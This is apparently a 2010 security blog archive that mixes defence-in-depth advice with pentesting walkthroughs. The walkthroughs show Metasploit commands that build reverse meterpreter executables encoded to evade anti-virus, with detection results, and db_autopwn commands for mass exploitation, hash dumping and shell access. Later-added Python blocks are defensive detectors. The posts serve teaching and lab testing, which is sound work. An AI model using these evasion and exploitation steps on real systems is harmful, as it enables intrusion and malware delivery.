Saturday, 28 August 2010

CISSP Defence in depth: How to protect the IT Systems in a corporate network

This is a big subject, and the detail could easily fill several books. Here I am going to discuss (very briefly) some of the ingredients that should be used to protect most corporate networks.

Some of these get forgotten about, so, "Calling all Sysadmins and Security Managers!": it is worth checking this list to see whether you have the appropriate controls in place.

People enforcing Security
The first thing you need is reliable and trustworthy people in the IT Security team.
These people need a good understanding of the risks and vulnerabilities.

I would also say that one of the most important attributes is that these enforcers of security need to be process-driven. A lot of the ingredients outlined below are repetitive processes and procedures, checks and balances. Some of them are boring after a while (backups and patch management, for example), but thoroughness and attention to detail are key.

Physical Security
This is the second thing you need. If you don't have security in the physical world, it doesn't matter how many processes, procedures, and technical controls you put in place. There is no point deploying all the things we discuss below if criminals can simply walk in off the street and walk out with your server under their arm, or if a fire burns down your building because your extinguishers don't work, or you didn't detect the fire.

Review your physical security. If you were a criminal, how would you steal some of the company's equipment or data? What disasters could happen, what would be the impact, and what controls can be put in place at reasonable cost?

Key things to think about:
  • Building Access Control
  • IT area Access Control
  • Laptops, iPhones/Blackberry theft
  • Fire, flood, hurricanes, earthquakes, pestilence and plague
  • Power outages

Laptop encryption
Though a technical control, I would consider laptop hard-disk encryption as part of your physical controls. What you are protecting the data from is someone having physical access to a stolen laptop. If you don't have HDD encryption, gaining access to the data on a laptop is trivial.

Operating system login controls do NOT protect the data on the hard-disk from being accessed. If you want to protect the data on laptops you must have hard-disk encryption.

Backups
This is fundamental data security. If you don't have effective and USABLE backups of your data, you basically don't have any data security.

Assume that all data and systems are transient and temporary, and that every piece of hardware will fail eventually. Also, upgrades, configuration changes and user errors can easily wipe out your precious data.

These days, a vast amount of the "value" of a company is in the data they hold. Many companies would fail as a business if their IT systems were not available for a week.

Regularly review and test your backups, and have reliable off-site storage for your data.
Also remember that, just because you can recover files from a tape, does not mean it will be quick, easy, or even possible to get that data back into your live systems.

I have had experience of situations where backup data was on tape, but it was not possible to recover it into the live environment, because of the time involved or because of complex database replication issues. Bear these issues in mind, and practise data recovery.

Documentation and change control
These often get forgotten about or done poorly, especially in small to medium businesses. If you don't have documentation, how are you going to put things back together "WHEN" they break? Is your documentation secure, structured, backed-up and stored off-site?

Change control is there to help the documentation update process, and protect you from breaking your own systems.

Additionally this helps to communicate changes to extended teams and end-users. You don't have to have full ITIL processes, but you do need appropriate processes to offer the correct level of protection for your business.

Do the appropriate level of change control. This will often be a little more than you feel you have time to do, but do it anyway because it will save time in the long run.

Firewalls
This is the cornerstone of logical security on the network. Rules need to be regularly reviewed. Port scanning and network scanning should be performed to ensure that the ruleset is correctly enforced, and that there are no accidental loopholes or inappropriate access.

Don't forget that outbound rules are just as important as inbound rules, especially given the increase in client-side attacks over recent years.

It is as important to protect your DMZs and backend systems from the outside, as it is to protect them from potentially compromised systems on the LAN.

Anti-virus
All systems should have appropriate virus protection.

Are the AV definitions up-to-date on all your systems? If not, then this protection is not effective, and arguably useless.

Choose a good vendor, as there are vast differences in the regularity of updates and the scope of protection. Some of the largest IT Security vendors have products that are surprisingly weak. Review third-party comparisons and choose appropriately.

Email and Web content filtering proxies
These are the biggest and fastest vectors for malware and virus infection. Choose good solutions, and update your policies regularly.

Block executable code on Email and Web proxies, because viruses WILL get through. Most virus and malware detection is signature-based, which means that it cannot be detected until it has already been seen in the wild.

That in turn means that, somewhere in the world, systems have already been infected hours before the Anti-virus companies can offer detection signatures to their customers. If you get new malware before the signatures are published, your AV-tool will offer you no protection at all. Block exes on your proxies.
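As an added example (not from the original post), here is the kind of content check that needs to sit behind a "block exes on the proxy" rule: it recognises a Windows PE file from its MZ/PE headers rather than from the file name or the declared Content-Type. The sample buffers are constructed, not real files.

```python
"""
Content-based executable check for a web or mail proxy policy. Added example, not
from the original post: it recognises a Windows PE file from its MZ/PE headers
rather than from the file name or declared Content-Type. Sample buffers are
constructed, not real files.
"""
import struct

MZ_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"
IMAGE_FILE_DLL = 0x2000   # Characteristics flag in the COFF file header
COFF_HEADER_SIZE = 20
# Extensions a proxy would refuse by name as well; the content check catches the rest.
BLOCKED_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".pif"}


def pe_kind(data: bytes):
    """Return 'dll', 'exe' or None depending on whether data carries a valid PE header."""
    if len(data) < 0x40 or data[:2] != MZ_MAGIC:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the PE signature
    # The signature and the COFF header must both fit inside the buffer.
    if e_lfanew + 4 + COFF_HEADER_SIZE > len(data):
        return None
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return None
    characteristics = struct.unpack_from("<H", data, e_lfanew + 4 + 18)[0]
    return "dll" if characteristics & IMAGE_FILE_DLL else "exe"


def proxy_decision(filename: str, content_type: str, data: bytes):
    """Decide whether a download may pass; returns (verdict, reason)."""
    kind = pe_kind(data)
    if kind:
        return "block", "content is a Windows PE %s (declared %r, name %r)" % (kind, content_type, filename)
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in BLOCKED_EXTENSIONS:
        return "block", "extension %s is on the blocked list" % ext
    return "allow", "no executable content detected"


def build_sample_pe(dll: bool = False) -> bytes:
    """Constructed minimal buffer: DOS header whose e_lfanew points at a PE signature and COFF header."""
    dos = bytearray(0x40)
    dos[:2] = MZ_MAGIC
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header right after the DOS header
    coff = bytearray(COFF_HEADER_SIZE)
    struct.pack_into("<H", coff, 18, IMAGE_FILE_DLL if dll else 0x0102)   # Characteristics
    return bytes(dos) + PE_SIGNATURE + bytes(coff)


# Constructed samples: PE content under an image name, a JPEG-like header, a DOS-only MZ stub.
SAMPLE_PE_AS_IMAGE = build_sample_pe()
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 64
SAMPLE_DOS_ONLY = b"MZ" + b"\x00" * 0x3E + b"not a PE"

if __name__ == "__main__":
    for name, ctype, blob in [("holiday.jpg", "image/jpeg", SAMPLE_PE_AS_IMAGE),
                              ("holiday.jpg", "image/jpeg", SAMPLE_JPEG),
                              ("setup.exe", "application/octet-stream", SAMPLE_JPEG)]:
        print(name, *proxy_decision(name, ctype, blob))
```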

Patch Control
This is often a problem area for many companies. It is time-consuming for IT departments, can introduce new problems, and is largely hidden from the rest of the business as a "benefit".

However, the risks are high, and unpatched systems are easily compromised by attackers and viruses.

Regularly patch both operating systems and applications. Put in place a regular patch management program, and produce metrics to monitor how up-to-date your systems are.

Don't just rely on WSUS to tell you that your systems are up-to-date: scan your subnets with a vulnerability scanner, and don't forget about non-Microsoft systems.

Don't forget about applications on Servers or Clients. Out-of-date client software, such as old versions of Microsoft Office or Adobe Acrobat Reader can be big weaknesses.

Vulnerability scanning
This assists your patch management and configuration management processes.

You may think you have all your systems up-to-date, but unless you have done some vulnerability scanning and analysis, you are probably wrong.

Vulnerability scanners can be expensive, but they can also be free (OpenVAS, for example). Regularly scan your systems, review the scans to remove false positives, and act when systems have real vulnerabilities.

Intrusion detection
Detecting attacks, in both the physical and logical worlds, is important.

This may not be a standalone system. It may be built into your corporate firewall, into firewalls on individual systems, or into your anti-virus tool.
I would recommend deploying dedicated intrusion detection in many cases. This can be done relatively cheaply (with something like Snort).

Review logs and alerts; there is no point spending money and time setting up monitoring systems if you don't do anything about it when alerts happen.

Remove false positives from your monitoring so that the logs and alerts are usable.

Friday, 27 August 2010

Hacking techniques: Using msfencode to obscure a "trojan" meterpreter shellcode executable from Anti-virus tools

Why are we doing this?
There are a lot of interesting and useful features to play with in the Metasploit meterpreter payload, especially with the extensible scripts.

While I was experimenting with meterpreter sessions, I found it easier and quicker to use a prebuilt Windows PE executable of a reverse meterpreter payload.

I would recommend producing and using one of these in your test lab, as this enables you to simulate the pwnage of a vulnerable application on a fully patched system. This is helpful as it enables you to get familiar with meterpreter features and post-exploitation techniques, such as hashdumping, information gathering, further network enumeration, tunneling techniques, and secondary attacks, in an easily reproducible way.

Please only use these methods for testing and educational purposes. I do not advocate breaking the law or attacking systems where you do not have permission.

Making testing easier
Producing a meterpreter executable payload is relatively easy, but I initially found that this executable was easily detected by the Anti-virus on my test Windows system. So we also discuss encoding this executable multiple times using msfencode. In the following examples I am using Backtrack 4 R1.

Producing a meterpreter executable
To produce an example executable, you can use msfpayload as follows:

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /var/www/met.exe

Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=,LPORT=4444

ls -l /var/www/met.exe

-rw-r--r-- 1 root root 73802 Aug 20 19:00 /var/www/met.exe

I tried downloading this to my test "victim" system, and it was immediately detected by the desktop Anti-virus tool and quarantined as a "trojan". Understandable, but I want to do some testing without disabling my security features. (I don't want to get any real viruses or trojans ;o)

Encoding the payload
So, let's try encoding it using msfencode. We need to produce the payload in raw format, and then pipe this to msfencode, which will produce the executable:

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -t exe > /var/www/metenc1.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

I downloaded this to my target system, but nope, still detected by my Anti-virus tool.

Further encoding
Let's get some help:

./msfencode -h

    Usage: ./msfencode


    -a   The architecture to encode as
    -b   The list of characters to avoid: '\x00\xff'
    -c   The number of times to encode the data
    -e   The encoder to use
    -h        Help banner
    -i   Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m   Specifies an additional module search path
    -n        Dump encoder information
    -o   The output file
    -p   The platform to encode for
    -s   The maximum size of the encoded data
    -t   The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
    -x   Specify an alternate win32 executable template

Using the -c option, msfencode enables you to repeat the encoding process recursively multiple times. Let's go crazy, encode it 21 times, and see what happens:

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -c 21 -t exe > /var/www/metenc21.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

... truncated for your sanity ...

[*] x86/shikata_ga_nai succeeded with size 804 (iteration=21)

In my tests this payload didn't get detected, it runs fine, and so I was able to use it for what I wanted in my test environment. I just needed to start msfconsole, set up a handler to catch the session, and then double-click the meterpreter executable on the "victim" desktop. Easy.

So how much encoding is required to get past the average AV-tool?
However, I was a bit curious about this (as I always am). I like to know how things work, and where the limitations are.

So how about building a whole batch of these babies, each with a different number of encoding iterations, and seeing which ones get detected and which don't. Time for a bash one-liner:

for num in $(seq 1 20); do ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -c $num -t exe > /var/www/metenc$num.exe; done

So, then I had a whole army of 20 encoded reverse meterpreter payload exes, so I put some of them to the test with an online scanner that can scan against 40+ Anti-virus tools.

Here are my results for some of the encodings, showing the number of tools that detected our reverse meterpreter exe payload as a backdoor/trojan:

Native exe payload = 14/42 AV tools detected it

That seems very low to me, and here are some examples of the encoded ones:

1 encoding = 3/42 AV tools
2 encodings = 8/42 AV tools
5 encodings = 6/42 AV tools
10 encodings = 8/42 AV tools
15 encodings = 8/42 AV tools
18 encodings = 7/42 AV tools
20 encodings = 1/42 AV tools = AVG

The results seem very variable, but I guess this is to be expected, as each encoding is somewhat randomized, and my submissions were not previously known in the hash database.

For these tests, I declare AVG the winner! as it outperformed the other tools.

AhnLab-V3, AntiVir, Antiy-AVL, CAT-QuickHeal, ClamAV, Comodo, DrWeb, eSafe, eTrust-Vet, Fortinet, Jiangmin, Kaspersky, McAfee, McAfee-GW-Edition, Panda, PCTools, Prevx, Rising, Sophos, Sunbelt, SUPERAntiSpyware, Symantec, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, ViRobot, VirusBuster... In these tests for some reason you FAIL!

So it just goes to show that, for a payload with known functionality, produced by a very well-known tool (Metasploit), backdoor/trojan detection is surprisingly poor!

  • Never rely on Anti-virus alone - use defence in depth
  • Content security solutions should block exe code in web and email traffic, even if it is not a known virus it could easily be custom malware
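To show why the -c iteration count alone is a weak hiding place, here is an added example (not from the original post) of a heuristic that looks for the FPU GetPC sequence an x86/shikata_ga_nai decoder stub starts with: because each iteration wraps the previous output in a fresh stub of the same shape, the outermost stub is still in the clear however many times the payload was encoded. The opcode bytes are standard x86 encodings; the search windows and the sample buffers are my assumptions and constructions, and a match is a triage signal rather than a verdict, since legitimate FPU code can produce the same bytes.

```python
"""
Heuristic for the FPU "GetPC" sequence that x86/shikata_ga_nai decoder stubs use to
find their own address: an x87 instruction, then fnstenv [esp-0xc], then pop r32.
Added example, not from the original post. Opcode bytes are standard x86 encodings;
the search windows are assumptions and the sample buffers are constructed.
"""
import sys

FNSTENV_ESP_MINUS_12 = b"\xd9\x74\x24\xf4"   # fnstenv [esp-0xc]: saves FPU state, including the last FPU EIP
X87_FIRST_BYTES = range(0xD8, 0xE0)          # every x87 instruction starts with d8..df
POP_R32 = range(0x58, 0x60)                  # pop eax .. pop edi: retrieves the saved EIP


def find_fpu_getpc(data: bytes, before: int = 10, after: int = 8):
    """Offsets of fnstenv [esp-0xc] with an x87 opcode shortly before and a pop r32 shortly after."""
    hits = []
    start = 0
    while True:
        idx = data.find(FNSTENV_ESP_MINUS_12, start)
        if idx < 0:
            return hits
        head = data[max(0, idx - before):idx]
        tail_start = idx + len(FNSTENV_ESP_MINUS_12)
        tail = data[tail_start:tail_start + after]
        # The encoder may interleave key/counter setup (mov, xor) between the three pieces,
        # so we only require them to be close together, not adjacent.
        if any(b in X87_FIRST_BYTES for b in head) and any(b in POP_R32 for b in tail):
            hits.append(idx)
        start = idx + 1


def scan_file(path: str):
    """Return the matching offsets in a file on disk (for example one of the metenc*.exe files)."""
    with open(path, "rb") as fh:
        return find_fpu_getpc(fh.read())


# Constructed stub shapes, not real encoder output.
# fcmovnb st0,st2 ; fnstenv [esp-0xc] ; pop esi ; mov ecx, key
SAMPLE_STUB_A = b"\xda\xc2" + FNSTENV_ESP_MINUS_12 + b"\x5e" + b"\xb9\x41\x42\x43\x44"
# fldpi ; mov ecx, key ; fnstenv [esp-0xc] ; pop edi   (setup moved between the pieces)
SAMPLE_STUB_B = b"\xd9\xeb" + b"\xb9\x11\x22\x33\x44" + FNSTENV_ESP_MINUS_12 + b"\x5f"
# fnstenv present but never followed by a pop: plain FPU state saving, no hit expected.
SAMPLE_BENIGN = b"\x55\x8b\xec\xdd\xd1" + FNSTENV_ESP_MINUS_12 + b"\x90" * 8 + b"\xc3"

if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, scan_file(path))
```

The same byte sequence is the sort of thing an IDS such as Snort can look for in downloaded content, which is why "never rely on anti-virus alone" and "block exes on the proxy" belong together.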

My first tests of Backtrack 4 R1

On the 5th of August 2010 I was very happy to see an email notification from the Backtrack team, telling me that Backtrack 4 R1, their latest ethical hacking and penetration testing toolset, was released. (This is the kind of email I like!)

Backtrack has been around for over 4 years, and has got to be the best and most widely used hacking platform, with hundreds of tools and various development environments preinstalled, configured and ready to go out of the box.

This updated version 4 release is great news, as we can see that the Backtrack team are working well and striving to improve what is already a great toolset. There seems to be significant investment of effort in the platform, so I hope this open-source project will continue to flourish for considerable time to come.

Downloads of the previous release, Backtrack 4, topped over 1 million over the first six months, and this new release has already seen significant download traffic.

You can find the download for Backtrack 4 R1 at the following location, and it is available in both ISO image (for a DVD) and VMware formats

So far, I've only done a dual-boot hard drive install on this system (BT4 and BT4 R1) and they seem to run fine side by side. The installation was very straightforward, and basically the same as BT4, i.e. cut a DVD, boot from that, and run the setup script on the desktop.

What has changed?
On initial install and bootup there don't seem to be any significant changes to the way things work, or how the tools are laid out, which is good, as I am already very happy with BT4.

Flux support has been added, though having used BT4 for some time now, I will probably stick with KDE (most of what I do is on the commandline anyway).

Improved driver support
One personal bonus, that I have quickly seen for me, is that the wifi drivers for my Dell mini 10v are now supported out of the box. I was struggling to get these to work with BT4, and this means I don't need to always carry around an extra dongle. Great!

Updates and tool improvements
Signature updates for various tools have been applied, so this saves a couple of hours, running various updates, for any new installs you have.

Other things of note
  • Dragon configurator
  • Updated Social Engineering Toolkit
  • Updated and sexier Maltego 3.0
  • Metasploit 3.4.2

Other than that, not much to say really...

Backtrack 3 is not dead yet
As a side note, though BT4R1 looks great, I will continue to keep archives of the old versions in my disc collection which can be handy sometimes.

For example, I had an issue not so long ago where I went back to Backtrack 3 for an awkward task.

We had a problem with a server that nobody knew the login credentials for. It was a fairly old system, and it only had a CD drive. We could not boot it from either a USB stick or an external DVD drive, for various reasons, so we were unable to use BT4.

To cut a long story short, we whipped out a BT3 CD, booted from that, and had the Windows Administrator hash cracked in around an hour, giving us the access we needed. So there is life in the old dog yet ;o)

Be good.

Tuesday, 17 August 2010

Mass Pwnage: Hacking with Metasploit db_autopwn and reverse meterpreter payloads

Metasploit is a powerful exploitation framework and can be used to scan and attack multiple systems in an automated way. Here we look at some basic examples of using the Metasploit db_autopwn feature.

These techniques can be used to scan networks, identifying real exploitable vulnerabilities en masse. Patch management and proper configuration are usually the cures for most of these vulnerabilities, but knowing where the exploitable vulnerabilities are in a network is the first step to focusing your efforts on the areas most in need.

Also, knowing the power that an attacker can wield with such tools can help raise the priority of IT Security in risk assessment, especially when reporting to management, so that the correct resources can be applied to reduce risks.

Please be good and do not abuse these techniques to attack systems where you don't have express permission. These techniques can easily cause denial of service, and should only be used for pentesting and educational purposes.

We will be using Backtrack 4 R1 in these examples, as Metasploit and MySQL are already installed and preconfigured.

We are going to be logging our information to a database, so let's start MySQL first:

/etc/init.d/mysql start
netstat -antp |grep 3306

tcp        0      0*               LISTEN      5852/mysqld

That's MySQL running OK; now let's start Metasploit:
cd /pentest/exploits/framework3/

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9959 updated 8 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 8 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:


First we will select a database driver, in this case MySQL:

db_driver mysql

Basic db_autopwn pwnage
In the first example we will create a new database called mytest1 using our MySQL credentials, connect to it, and scan a single machine using nmap. Then we will run all the exploits that match the open ports that are found:

db_connect root:toor@mytest1
db_autopwn -p -t -e -r

The db_autopwn options in this example will match exploits to open ports (-p), show the exploits to be run (-t), run the exploits (-e), and connect back using a reverse meterpreter payload (-r).

This may take several minutes to run, depending on the number and types of open ports. HTTP ports can take a long time, due to the large number of exploits included in Metasploit for the well-known HTTP ports. Let the exploitation complete (it may take 10 minutes or more depending on your connectivity to the victim system).

If any exploits are successful, a list of active sessions to the victim machine will be shown. We have a reverse meterpreter session and we can interact with it as follows:

sessions -l

Active sessions

  Id  Type         Information                    Connection
  --  ----         -----------                    ----------
  1   meterpreter  TEST-DESKTOP\Ben @ TEST-DESKTOP ->

sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Once we connect to the session, further attacks and analysis can proceed as follows:

1) Obtaining the password hashes:

use priv
Loading extension priv...success.


2) Uploading and downloading files:

upload /var/www/plink.exe c:\\
[*] uploading  : /var/www/plink.exe -> c:\
[*] uploaded   : /var/www/plink.exe -> c:\\plink.exe

download c:\\windows\\system32\\drivers\\etc\\hosts /root/hosts
[*] downloading: c:\windows\system32\drivers\etc\hosts -> /root/hosts
[*] downloaded : c:\windows\system32\drivers\etc\hosts -> /root/hosts

3) Gaining a shell:

Process 2640 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

IP address range exploitation
Attacking multiple machines is where the power of db_autopwn really comes into effect.

Let's scan, and attempt to exploit, a whole subnet in a new database:

db_driver mysql
db_connect root:toor@mysubnet1

Now let's look at the systems we have data on:



address        address6  arch  comm  comments  created_at                    info  mac                name            os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at                    svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------                    ----  ---                ----            ---------  -------  -------  -----  -------  -----  ----------                    ----  -----  ---------
                                               Tue Aug 17 12:51:56 UTC 2010        00:0E:50:EC:B2:A6  speedtouch.lan                                               alive  Tue Aug 17 12:51:56 UTC 2010  5     0      default
                                               Tue Aug 17 13:22:14 UTC 2010        00:22:3F:E9:89:FF  test_system.lan                                              alive  Tue Aug 17 13:22:14 UTC 2010  4     0      default

Again, an exploitation of the scanned machines could be run as follows:

db_autopwn -p -t -e -r

However, depending on the number of machines found, running this exploitation may take considerable time.

Additionally, in a live pentest, exploiting many systems at once can cause denial of service headaches on multiple systems. This can be mitigated by focusing the exploitation on particular ports, or particular ranges of machines, and working through the network gradually, logging vulnerabilities in our database as we go.

The exploitation can be focused by IP address range:

db_autopwn -p -t -e -r -I

...or by port:

db_autopwn -p -t -e -r -PI 445

...or both:

db_autopwn -p -t -e -r -PI 445 -I

For large numbers of vulnerable machines, this makes the exploitation and analysis more manageable, especially on production networks where live services may be affected and need to be restarted.

What have we found?
We exploited multiple vulnerabilities in several systems, gained access, and "did stuff", but which vulnerabilities did we exploit on these systems?

You can interrogate the list of successful exploitations by running the following command in Metasploit:


Alternatively, we can go and have a poke around in the MySQL database directly, with the following sequence of commands:

mysql -u root -ptoor

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
| Database           |
| information_schema |
| mysql              |
| mysubnet1          |
7 rows in set (0.36 sec)

mysql> use mysubnet1;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
| Tables_in_mysubnet1 |
| clients             |
| events              |
| hosts               |
| loots               |
| notes               |
| refs                |
| reports             |
| schema_migrations   |
| services            |
| tasks               |
| users               |
| vulns               |
| vulns_refs          |
| wmap_requests       |
| wmap_targets        |
| workspaces          |
16 rows in set (0.00 sec)

mysql> select * from vulns;

We have completed our basic pentest on our subnet, and identified some vulnerable hosts. We know exactly which ones, and what needs to be fixed.

Take a bow for a round of applause, time for a tea break... and that was a basic guide to db_autopwn.
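Turning the vulns table into a fix list is the defender's end of this exercise. Here is an added example (not from the original post) that joins the hosts, services and vulns tables listed above into a per-host remediation list and a "which exploit worked on the most hosts" summary; it uses an in-memory SQLite copy of a reduced schema so it runs offline. Apart from the hosts columns shown on the page, the column names (host_id, service_id, port, proto, name) are assumptions, and all rows and addresses are constructed.

```python
"""
Per-host remediation report from the Metasploit database tables (hosts, services,
vulns). Added example, not from the original post: an in-memory SQLite copy of a
reduced schema stands in for the MySQL database so it runs offline. Column names
other than the hosts columns shown on the page are assumptions; rows are constructed.
"""
import sqlite3
from collections import Counter

SCHEMA = """
CREATE TABLE hosts    (id INTEGER PRIMARY KEY, address TEXT, name TEXT, state TEXT);
CREATE TABLE services (id INTEGER PRIMARY KEY, host_id INTEGER, port INTEGER, proto TEXT, name TEXT);
CREATE TABLE vulns    (id INTEGER PRIMARY KEY, host_id INTEGER, service_id INTEGER, name TEXT);
"""

# Constructed sample data: one clean host and two hosts with confirmed exploits.
# The vuln names are placeholders for the exploit module that succeeded.
SAMPLE_ROWS = {
    "hosts": [(1, "192.0.2.1", "speedtouch.lan", "alive"),
              (2, "192.0.2.20", "test_system.lan", "alive"),
              (3, "192.0.2.21", "test_system2.lan", "alive")],
    "services": [(1, 1, 80, "tcp", "http"),
                 (2, 2, 445, "tcp", "smb"), (3, 2, 80, "tcp", "http"),
                 (4, 3, 445, "tcp", "smb")],
    "vulns": [(1, 2, 2, "exploit/windows/smb/EXAMPLE_SMB_EXPLOIT"),
              (2, 2, 3, "exploit/windows/http/EXAMPLE_HTTP_EXPLOIT"),
              (3, 3, 4, "exploit/windows/smb/EXAMPLE_SMB_EXPLOIT")],
}

REPORT_SQL = """
SELECT h.address, h.name, s.port, s.proto, v.name
FROM hosts h
LEFT JOIN vulns v    ON v.host_id = h.id
LEFT JOIN services s ON s.id = v.service_id
ORDER BY h.address, s.port
"""


def load_sample_db():
    """Build the reduced schema in memory and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        placeholders = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({placeholders})", rows)
    return conn


def remediation_report(conn):
    """Map each host address to its (port, proto, exploit) findings; clean hosts map to []."""
    per_host = {}
    for address, name, port, proto, vuln in conn.execute(REPORT_SQL):
        findings = per_host.setdefault(address, [])
        if vuln is not None:          # LEFT JOIN leaves vuln NULL for hosts with no findings
            findings.append((port, proto, vuln))
    return per_host


def exploit_prevalence(report):
    """Count how many distinct hosts each exploit worked on, most widespread first."""
    counts = Counter(vuln for findings in report.values() for (_, _, vuln) in set(findings))
    return counts.most_common()


if __name__ == "__main__":
    report = remediation_report(load_sample_db())
    for address, findings in report.items():
        print(address, findings or "clean")
    print(exploit_prevalence(report))
```

The same REPORT_SQL runs unchanged against the real MySQL database if the assumed column names hold, which is the point of keeping the query separate from the sample loader.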

These threats are best mitigated using an IT Security program which includes:
  • Multiple layers (defense in depth)
  • Secure application development/deployment
  • Applying recommended safe configurations
  • Patch management and software upgrades
  • Vulnerability scanning and remediation